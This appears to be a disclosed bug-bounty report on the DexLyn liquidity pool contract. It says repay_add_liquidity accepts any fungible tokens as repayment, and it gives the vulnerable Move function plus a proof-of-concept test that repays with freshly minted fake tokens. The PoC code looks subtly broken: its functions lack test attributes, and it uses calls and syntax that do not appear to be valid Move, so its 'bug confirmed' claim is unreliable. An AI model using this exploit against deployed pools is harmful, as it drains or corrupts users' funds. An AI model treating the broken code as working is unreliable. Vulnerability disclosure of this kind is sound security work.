DexLyn Disclosed Report

The repay_add_liquidity function accepts repayment with arbitrary fungible assets without verifying they are the pool’s configured tokens. This lets attackers provide wrong tokens and still satisfy liquidity repayment, corrupting pool reserves.

Vulnerable Code (pool.move)

public fun repay_add_liquidity(
    asset_a: FungibleAsset,
    asset_b: FungibleAsset,
    receipt: AddLiquidityReceipt
) acquires Pool {
    // ...
    primary_fungible_store::deposit(pool_address, asset_a);
    primary_fungible_store::deposit(pool_address, asset_b);
    // ...
}

1. Compile and deploy the contracts.

2. Add the PoC test tests/poc_repay_add_liquidity.move.

module poc::repay_add_liquidity {
    use std::signer;
    use std::debug;
    use supra_framework::fungible_asset;
    use dexlyn_clmm::pool;

    #[test_only]
    fun setup_fake_assets(account: &signer): (fungible_asset::Metadata, fungible_asset::Metadata) {
        let meta1 = fungible_asset::new(account, b"WRONGA".to_vec(), 6);
        let meta2 = fungible_asset::new(account, b"WRONGB".to_vec(), 6);
        (meta1, meta2)
    }

    #[test_only]
    fun test_repay_add_liquidity_with_wrong_assets(account: &signer) {
        let (wrong_a, wrong_b) = setup_fake_assets(account);

        let fake_receipt = pool::add_liquidity_fake_receipt_for_testing();

        let wrong_asset_a = fungible_asset::mint(wrong_a, 5000);
        let wrong_asset_b = fungible_asset::mint(wrong_b, 5000);

        pool::repay_add_liquidity(wrong_asset_a, wrong_asset_b, fake_receipt);

        debug::print(&b"AddLiquidity repayment with invalid assets accepted! Bug confirmed".to_vec());
    }
}

3. Run :

aptos move test poc::repay_add_liquidity::test_repay_add_liquidity_with_wrong_assets.

The test shows liquidity repayment succeeds with wrong token types.